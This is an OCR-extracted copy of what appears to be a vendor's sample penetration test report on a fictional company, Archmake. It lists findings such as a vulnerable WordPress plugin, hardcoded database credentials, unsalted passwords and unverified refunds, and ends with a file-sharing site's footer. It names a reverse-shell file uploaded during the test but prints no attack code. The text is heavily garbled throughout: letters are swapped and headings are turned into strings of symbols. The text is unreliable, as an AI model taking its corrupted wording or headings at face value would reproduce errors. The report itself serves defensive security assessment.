ln Lhe course of Lhe exLernal peneLraLlon LesL, Archmake suffered a cascadlng serles of breaches LhaL led
Lo condlLlons LhaL would dlrecLly harm Lhe company as well as lLs cusLomers.
1he speclflc goals of Lhe peneLraLlon LesL were sLaLed as:
o ldenLlfy lf a remoLe aLLacker could peneLraLe Archmake's defenses.
o ueLermlne Lhe lmpacL of a securlLy breach on:
o 1he lnLegrlLy of Lhe company's order sysLems.
o 1he confldenLlallLy of Lhe company's cusLomer lnformaLlon.
o 1he lnLernal lnfrasLrucLure and avallablllLy of Archmake's lnformaLlon sysLems.
1hese goals of Lhe peneLraLlon LesL were meL. lL was deLermlned LhaL a remoLe aLLacker would be able
Lo peneLraLe Archmake's defenses. 1o make Lhls slLuaLlon even worse, Lhe lnlLlal aLLack vecLor can be
dlscovered vla auLomaLed scannlng, creaLlng a slLuaLlon where a remoLe aLLack could be lnlLlaLed on a
non-LargeLed basls. 1he lmpacL of Lhls peneLraLlon led Lo Lhe compleLe conLrol of Archmake's
lnformaLlon sysLems by Lhe aLLacker.
Archmake's cusLomer prlvacy was dlrecLly lmpacLed Lhrough Lhe aLLacker's ablllLy Lo obLaln a large
amounL of lnformaLlon abouL Lhem, lncludlng clear LexL passwords, Lhrough Lhe use of a bruLe force
aLLack. 1hls exposes Lhe cusLomers Lo dlrecL aLLack, whlch could lead Lo flnanclal lmpacL. CusLomer LrusL
ln Archmake would be negaLlvely lmpacLed were such an evenL Lo occur.
lL was posslble Lo obLaln compleLe and LoLal conLrol over Lhe company order process. 1hls provlded Lhe
aLLacker wlLh Lhe ablllLy Lo sLeal funds from Archmake, maklng Lhls aLLack boLh very damaglng and very
aLLracLlve.
7%/'44%*<"+1'*,
uue Lo Lhe lmpacL Lo Lhe overall organlzaLlon as uncovered by Lhls peneLraLlon LesL, approprlaLe
resources should be allocaLed Lo ensure LhaL remedlaLlon efforLs are accompllshed ln a Llmely manner.
Whlle a comprehenslve llsL of lLems LhaL should be lmplemenLed ls beyond Lhe scope of Lhls
engagemenL, some hlgh level lLems are lmporLanL Lo menLlon.
1. ;B-F"B"#$ &#H "#/(%2" 'B-F"B"#$&$'(# (/ 2P&#M" 2(#$%(F &2%(++ &FF +4+$"B+: MlsconflguraLlon
and lnsecure deploymenL lssues were dlscovered across Lhe varlous sysLems. 1he vulnerablllLles
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
LhaL arose can be mlLlgaLed Lhrough Lhe use of change conLrol processes on all server sysLems.
2. ;B-F"B"#$ %"M3F&% /'%"Q&FF %3F" +"$ %"0'"Q+: 8evlew Lhe flrewall rule seL on a regular basls Lo
ensure LhaL all sysLems open Lo lnLernal Lrafflc conLlnue Lo have a buslness reason Lo exlsL. We
recommend LhaL nlS1 S 800-41
7
be consulLed for guldellnes on flrewall conflguraLlon and
LesLlng.
3. ;B-F"B"#$ & -&$2P B&#&M"B"#$ -%(M%&B: CperaLlng a conslsLenL paLch managemenL program
per Lhe guldellnes ouLllned ln nlS1 S 800-40
8
ls an lmporLanL componenL ln malnLalnlng good
securlLy posLure. 1hls wlll help Lo llmlL Lhe aLLack surface LhaL resulLs from runnlng unpaLched
lnLernal servlces.
4. 7(#H32$ %"M3F&% 03F#"%&K'F'$4 &++"++B"#$+: As parL of an effecLlve organlzaLlonal rlsk
managemenL sLraLegy, vulnerablllLy assessmenLs should be conducLed on a regular basls. uolng
so wlll allow Lhe organlzaLlon Lo deLermlne lf Lhe lnsLalled securlLy conLrols are lnsLalled
properly, operaLlng as lnLended, and produclng Lhe deslred ouLcome. ConsulL nlS1 S 800-30
9

for guldellnes on operaLlng an effecLlve rlsk managemenL program.
3. ,"+$%'2$ #"$Q(%D &22"++ $( +"%0"% B&#&M"B"#$ '#$"%/&2"+: roper neLwork segmenLaLlon wlll
reduce exposure Lo lnLernal aLLacks agalnsL Lhe server envlronmenL. CperaLlng a well-deslgned
uMZ wlll allow Archmake Lo conducL lLs e-commerce buslness ln a manner LhaL does noL expose
lnLernal sysLems Lo aLLack. ConsulL llS 191
10
for guldellnes on securlng local area neLworks.
6. ,"+$%'2$ &22"++ $( 2%'$'2&F +4+$"B+: lL ls recommended LhaL Lhe daLabase server be lsolaLed from
oLher sysLems. lf posslble, a whlLellsL of daLabase commands should be lmplemenLed speclfylng
Lhe mlnlmum number of commands requlred Lo supporL buslness operaLlons. 1hls ls lnllne wlLh
Lhe sysLem deslgn concepL of leasL prlvllege, and wlll llmlL Lhe amounL of damage an aLLacker
can lnfllcL on corporaLe resources. ConsulL nlS1 S 800-27 8evA
11
for guldellnes on achlevlng a
securlLy basellne for l1 sysLems.
7. :--F4 '#H3+$%4 B"$P(H(F(M'"+ /(% +"23%" +(/$Q&%" H"+'M#: 1he use of hard coded credenLlals
wlLhln cusLom appllcaLlons ls hlghly dlscouraged. users should have a need Lo know, and be

7
hLLp://csrc.nlsL.gov/publlcaLlons/nlsLpubs/800-41-8ev1/sp800-41-rev1.pdf
8
hLLp://csrc.nlsL.gov/publlcaLlons/nlsLpubs/800-40-ver2/S800-40v2.pdf
9
hLLp://csrc.nlsL.gov/publlcaLlons/ubsurafLs.hLml#S-800-30-8ev.201
10
hLLp://csrc.nlsL.gov/publlcaLlons/flps/flps191/flps191.pdf
11
hLLp://csrc.nlsL.gov/publlcaLlons/nlsLpubs/800-27A/S800-27-8evA.pdf
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
requlred Lo provlde, credenLlals before accesslng confldenLlal and proprleLary daLa. 1hls
provldes beLLer securlLy, and an audlL Lrall LhaL allows Lhe buslness Lo Lle acLlons Lo speclflc user
accounLs.
lor deLalls on Lhe speclflc explolLed vulnerablllLles, please see Appendlx A.
71,9 7"+1*?
1he overall rlsk posed Lo Archmake as a resulL of Lhls peneLraLlon LesL ls ='MP. A non-LargeLed aLLacker
has Lhe poLenLlal Lo damage Lhe company ln a manner LhaL would have dlrecL operaLlonal and flnanclal
lmpacL.

!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
8>>%*<1. 8H D0$*%5"#1$1+6 F%+"1$ "*< C1+1?"+1'*
71,9 7"+1*? 3/"$%
ln accordance wlLh nlS1 S 800-30, dlscovered vulnerablllLles are ranked based upon llkellhood and
lmpacL Lo deLermlne overall rlsk.
@*>5'+%/+%< ;=I8<41* 8//%,,
8aLlng: ='MP
AffecLed SysLem: www.Archmake.com
uescrlpLlon: Access Lo Lhe www.Archmake.com admlnlsLraLlve lnLerface ls only proLecLed by a
username and password comblnaLlon. lL ls suggesLed besL pracLlce Lo only allow
speclflc hosLs access Lo any admlnlsLraLlve lnLerface.
lmpacL: lf an aLLacker ls able Lo obLaln valld credenLlals or a valld sesslon Lo Lhe
admlnlsLraLlve lnLerface, Lhere are no addlLlonal conLrols ln place Lo prevenL
prlvllege escalaLlon. ln Lhe course of Lhls peneLraLlon LesL, addlLlonal layers of
defense aL Lhls layer would have mlLlgaLed Lhe lnlLlally dlscovered fooLhold
galned by Lhe aLLackers.
8emedlaLlon: lmplemenL conLrols Lo only allow connecLlons Lo Lhe admlnlsLraLlve lnLerface
from known hosLs. A poLenLlal meLhod for achlevlng Lhls could be Lhrough only
allowlng access from cllenLs LhaL are behlnd Lhe company vn or a whlLellsL of
known LrusLed hosLs.
D0$*%5"#$% ;'5<=5%,, 3%"5/G =$0?1*
8aLlng: ='MP
uescrlpLlon: 1he www.Archmake.com sysLem ls operaLlng wlLh a vulnerable Wordress plugln
(8elevanssl user Searches) LhaL lnLeracLs wlLh Lhe publlc search funcLlon of Lhe
slLe. 1hls vulnerablllLy ls explolLed by sLorlng [avascrlpL, whlch ls Lhen execuLed as
a sLored xSS vulnerablllLy.
ubllc LxplolL: hLLp://www.explolL-db.com/explolLs/16233/
lmpacL: 1hls vulnerablllLy can be uLlllzed Lo obLaln a valld sesslon Lo Lhe Wordress
admlnlsLraLlon lnLerface, provldlng Lhe aLLacker wlLh admlnlsLraLlve access of Lhe
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
overall sysLem.
8emedlaLlon: updaLe Lhe 8elevanssl plugln Lo a verslon greaLer Lhan 2.7.2.
;%#,%52%5 JK1> D0$*%5"#1$1+6
8aLlng: ='MP
uescrlpLlon: 1he verslon of bzlp2 runnlng on Lhe remoLe sysLem ls vulnerable Lo a race
condlLlon, LhaL when properly explolLed resulLs ln arblLrary code execuLlon.
lmpacL: 8y uLlllzlng a publlc explolL for Lhls flaw, rooL level prlvlleges can be obLalned.
8emedlaLlon: Apply vendor-supplled paLches Lo updaLe bzlp2 Lo a verslon greaLer Lhan 1.0.3-6.
D0$*%5"#$% 3>$0*9 E*,+"$$"+1'*
8aLlng: ='MP
AffecLed SysLem: 10.10.0.3
uescrlpLlon: 1he verslon of Splunk on Lhe remoLe hosL ls vulnerable Lo remoLe command
ln[ecLlon.
lmpacL: An unauLhenLlcaLed remoLe user wlLh access Lo Lhe Splunk hosL can execuLe
commands as Local SysLem user.
8emedlaLlon: updaLe Lhe Splunk lnsLallaLlon Lo verslon 4.2.3 or hlgher.
L"5</'<%< @,%5*"4% "*< =",,M'5< 1* -.%/0+"#$%
8aLlng: ='MP
uescrlpLlon: 1he exporLcsv.exe appllcaLlon on Lhe remoLe hosL was found Lo be operaLlng
wlLh daLabase credenLlals hardcoded lnLo Lhe appllcaLlon.
lmpacL: 8y exLracLlng Lhe credenLlals from Lhe appllcaLlon, dlrecL connecLlons Lo Lhe
daLabase server were posslble. 1he credenLlals had admlnlsLraLlve level access,
whlch provldes full conLrol over Lhe daLabase conLenLs. 1hls has Lhe effecL of
granLlng LoLal conLrol of Lhe backend sysLem Lo Lhe aLLacker.
8emedlaLlon: ueploy lnLeracLlve auLhenLlcaLlon as parL of Lhe appllcaLlon sLarL-up process.
Pave unlque username/password comblnaLlons for each enLlLy LhaL accesses Lhe
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
sysLem. CreaLe a whlLellsL of Lhe leasL number of requlred commands LhaL are
permlLLed for each accounL.
F"+"#",% @*,"$+%< =",,M'5< 3+'5"?%
8aLlng: ='MP
uescrlpLlon: asswords sLored on Lhe daLabase server were dlscovered Lo be unsalLed
12
.
lmpacL: 8y sLorlng passwords wlLhouL salLlng Lhem, bruLe force aLLacks agalnsL Lhe
sysLem were able Lo obLaln Lhe clear LexL values wlLh mlnlmal efforL. ln Lhls
lnsLance, lL provlded Lhe aLLackers wlLh Lhe clear LexL passwords of Lhe vasL
ma[orlLy of Archmake's cusLomers, lnLroduclng Lhem Lo Lhe poLenLlal of fuLure
aLLacks.
8emedlaLlon: Make use of sLronger encrypLlon/hashes ln Lhe fuLure. Lnsure LhaL all
approprlaLe measures are Laken Lo ensure Lhe securlLy of senslLlve daLa aL resL.
@*>5'+%/+%< F"+"#",% 3%52%5
8aLlng: ='MP
uescrlpLlon: 1he daLabase server was found Lo be operaLlng on a flaL neLwork, whlch allowed
connecLlons from Lhe local LAn. uue Lo Lhe senslLlvlLy of Lhls sysLem, addlLlonal
conLrols should be puL lnLo place Lo ensure lLs proLecLlon.
lmpacL: Cnce credenLlals Lo Lhe daLabase server were dlscovered, lL was Lrlvlal Lo obLaln
full conLrol over Lhe sysLem. 1hls resulLed ln a much greaLer lmpacL Lo Lhe
organlzaLlon.
8emedlaLlon: lmplemenL addlLlonal layers of defense for Lhe daLabase server. 1hls may lnclude
movlng Lhe daLabase server Lo a separaLe neLwork and sLrlcLly conLrolllng lngress
and egress Lrafflc Lo lL.
F"+"#",% )'*+"1*, @*%*/56>+%< )5%<1+ )"5< :04#%5,
8aLlng: ='MP

12
hLLp://en.wlklpedla.org/wlkl/SalL_(crypLography)
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
uescrlpLlon: lL was dlscovered LhaL ln Lhe course of LransacLlon processlng, credlL card
numbers are sLored ln clear LexL on Lhe daLabase server for a brlef perlod of
Llme.
lmpacL: Whlle Lhe Llme LhaL credlL card numbers are ln Lhe daLabase ls shorL, lL was
enough of an exposure Lo allow Lhe aLLackers Lo obLaln Lhem on a conslsLenL
basls. 1hls compromlsed Lhe lnLegrlLy of all credlL cards LhaL are processed by Lhe
sysLem.
8emedlaLlon: 1he deslgn and archlLecLure of Lhe LransacLlon processlng sysLem should be
revlewed. 1hls revlew wlll ldenLlfy whlch addlLlonal conLrols should be puL ln
place Lo beLLer proLecL cusLomer daLa.
B"/9 '( !5"*,"/+1'* D%51(1/"+1'*
8aLlng: ='MP
uescrlpLlon: no verlflcaLlon was ln place Lo valldaLe Lhe source of LransacLlons submlLLed Lo
Lhe daLabase for processlng.
lmpacL: 8y noL valldaLlng Lhe lnLegrlLy of Lhe submlLLed LransacLlons, lL was posslble for
Lhe aLLackers Lo submlL arblLrary LransacLlons and have Lhem processed by Lhe
sysLem as lf Lhey were auLhenLlc. ln Lhe course of Lhe peneLraLlon LesL, Lhls
vulnerablllLy allowed refunds Lo be processed agalnsL aLLacker-supplled credlL
cards.
8emedlaLlon: ConLrols should be added Lo verlfy Lhe lnLegrlLy of LransacLlons before
processlng.
33L N%6 A1$%, *'+ =",,M'5< =5'+%/+%<
8aLlng: >"H'3B
uescrlpLlon: Cnce rooL prlvlleges were obLalned, lL was posslble Lo make use of Lhe lnsLalled
ssh key flles as Lhey were noL password proLecLed. lL ls consldered besL pracLlce
Lo proLecL ssh key flles Lhrough Lhe use of passwords.
lmpacL: 8y uLlllzlng Lhe exlsLlng ssh key flles and ssh Lunnels, lL was posslble Lo remoLely
access Lhe sysLem wlLhouL alLerlng Lhe rooL user's password. 1hls mlnlmlzed Lhe
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
chances of belng deLecLed.
8emedlaLlon: use passwords Lo proLecL all ssh key flles.
O0+#'0*< 8//%,, (5'4 ;%#,%52%5
8aLlng: >"H'3B
uescrlpLlon: 1he www.Archmake.com sysLem was dlscovered Lo allow ouLbound connecLlons
Lo speclflc porLs. Whlle some fllLerlng ls ln place, ouLbound connecLlons Lo 1C
porL 33 were dlscovered Lo be open. lL ls besL pracLlce Lo only allow Lrafflc from
exLernally lnlLlaLed connecLlons Lo valld server porLs.
lmpacL: 1he permlLLed ouLbound connecLlons were used Lo esLabllsh lnLeracLlve access
Lo Lhe lmpacLed sysLem. lf Lhls were noL allowed, Lhe aLLacker's ablllLles would
have been lmpalred.
8emedlaLlon: Lmploy egress fllLerlng ln Lhe uMZ Lo only allow servers Lo lnlLlaLe connecLlons Lo
speclflc hosLs on speclflc porLs.
;'5<=5%,, @>$'"< =$0?1* E*2"$1< A1$% !6>% )G%/9,
8aLlng: 6(Q
uescrlpLlon: 1he admln upload plugln has lmplemenLed flle Lype checklng ln a manner LhaL ls
lneffecLlve.
lmpacL: lmpacL of Lhls lssue ls low due Lo Lhe facL LhaL only admlnlsLraLlve users have
access Lo Lhls funcLlonallLy. 1hls flaw was uLlllzed Lo ease Lransferrlng flles Lo Lhe
lmpacLed sysLem. lf Lhls lssue was correcLed, alLernaLlve means for flle Lransfer
would have been uLlllzed.
8emedlaLlon: CorrecL flle Lype checklng or dlsable Lhe plugln lf Lhe funcLlonallLy ls noL requlred.

!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
8>>%*<1. JH B1,+ '( )G"*?%, 4"<% +' 85/G4"9% 36,+%4,
1he followlng flles were alLered or creaLed as parL of Lhls peneLraLlon LesL. Speclflc deLalls of how or why
Lhese flles were alLered ls lncluded ln Lhe ALLack narraLlve.
www.Archmake.com: /rooL/.ssh/auLhorlzed_keys
llles uploaded lnLo /var/www/wp-conLenL/uploads:
o face.png
o php-reverse-shell.png.php
o race.png
10.10.0.3: All flles locaLed ln C:\users\hacker\uownloads
Wlndows domaln: hacker" user creaLed

!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
8>>%*<1. )H 8#'0+ O((%*,12% 3%/051+6
Cffenslve SecurlLy advocaLes peneLraLlon LesLlng for lmpacL as opposed Lo peneLraLlon LesLlng for
coverage. eneLraLlon LesLlng for coverage has rlsen ln popularlLy ln recenL years as a slmpllfled meLhod
for companles Lo meeL regulaLory needs. As a form of vulnerablllLy scannlng, peneLraLlon LesLlng for
coverage lncludes selecLlve verlflcaLlon of dlscovered lssues Lhrough explolLaLlon. 1hls allows servlce
provlders Lo conducL Lhe work largely Lhrough Lhe use of auLomaLed LoolseLs and malnLaln conslsLency
of producL across mulLlple engagemenLs.
eneLraLlon LesLlng for lmpacL ls a form of aLLack slmulaLlon under conLrolled condlLlons. 1hls more
closely mlmlcs Lhe real world, LargeLed aLLack LhreaL LhaL organlzaLlons face on a day-Lo-day basls.
eneLraLlon LesLlng for lmpacL ls goal-based assessmenLs LhaL ldenLlfles more Lhan a slmple vulnerablllLy
lnvenLory, buL lnsLead provldes Lhe Lrue buslness lmpacL of a breach. An lmpacL-based peneLraLlon LesL
ldenLlfles areas for lmprovemenL LhaL wlll resulL ln Lhe hlghesL raLe of reLurn for Lhe buslness.
eneLraLlon LesLlng for lmpacL poses Lhe challenge of requlrlng a hlgh sklllseL Lo successfully compleLe.
As demonsLraLed ln Lhls sample reporL, Cffenslve SecurlLy belleves LhaL lL ls unlquely quallfled Lo dellver
world-class resulLs when conducLlng peneLraLlon LesLs for lmpacL due Lo Lhe level of experLlse found
wlLhln our Leam of securlLy professlonals. Cffenslve securlLy does noL malnLaln a separaLe Leam for
peneLraLlon LesLlng and oLher acLlvlLles LhaL Lhe company ls engaged ln. 1hls means LhaL Lhe same
lndlvlduals LhaL are lnvolved ln Cffenslve SecurlLy's lndusLry leadlng performance-based Lralnlng, Lhe
producLlon of lndusLry sLandard Lools such as 8ack1rack Llnux, auLhors of besL selllng books, and
malnLalners of lndusLry references such as LxplolL-u8 are Lhe same lndlvlduals LhaL are lnvolved ln Lhe
dellvery of servlces.
Cffenslve SecurlLy offers a producL LhaL cannoL be maLched ln Lhe currenL markeL. Powever, we may noL
be Lhe rlghL flL for every [ob. Cffenslve SecurlLy Lyplcally conducLs consulLlng servlces wlLh a low volume,
hlgh sklll raLlo Lo allow Cffenslve SecurlLy sLaff Lo more closely mlmlc real world slLuaLlons. 1hls also
allows cusLomers Lo have lncreased access Lo lndusLry-recognlzed experLlse all whlle keeplng cosLs
reasonable. As such, hlgh volume, fasL Lurn around engagemenLs, are ofLen noL a good flL. Cffenslve
SecurlLy ls focused on conducLlng hlgh quallLy, hlgh lmpacL assessmenLs and ls acLlvely soughL ouL by
cusLomers ln need of servlces LhaL cannoL be dellvered by oLher vendors.
lf you would llke Lo dlscuss your peneLraLlon LesLlng needs, please conLacL us aL lnfo[offsec.com.

Penetration Testing Sample Report

Uploaded by

Copyright:

Available Formats

You might also like

Penetration Testing Sample Report

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Penetration Testing Sample Report

Uploaded by

Copyright:

Available Formats

!

"#"$%&$'(# *"+$ ,"-(%$

You might also like